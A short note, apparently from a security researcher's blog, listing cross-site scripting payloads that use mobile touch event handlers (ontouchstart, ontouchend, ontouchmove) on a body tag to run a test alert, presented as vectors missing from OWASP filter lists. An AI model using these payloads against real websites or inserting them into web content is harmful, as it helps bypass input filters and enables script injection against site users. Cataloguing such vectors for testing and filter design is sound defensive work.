Some event handlers do not appear in the OWASP list. It is a touch event like ontouch*. It is a limited item on mobile devices, so it has a less effective effect than general purpose, but it is a good item to trigger XSS.
(In fact, sometimes I forgot this event handler. so i take a note!)
<body ontouchstart=alert(45)>
<body ontouchend=alert(45)>
<body ontouchmove=alert(45)>
<!--
[ ontouchstart ]
Triggers when a finger touch the screen
[ ontouchend ]
Triggers when a finger is removed from touch screen
[ ontouchmove ]
When a finger is dragged across the screen.
-->
only mobileā¦, pc browser is not running code |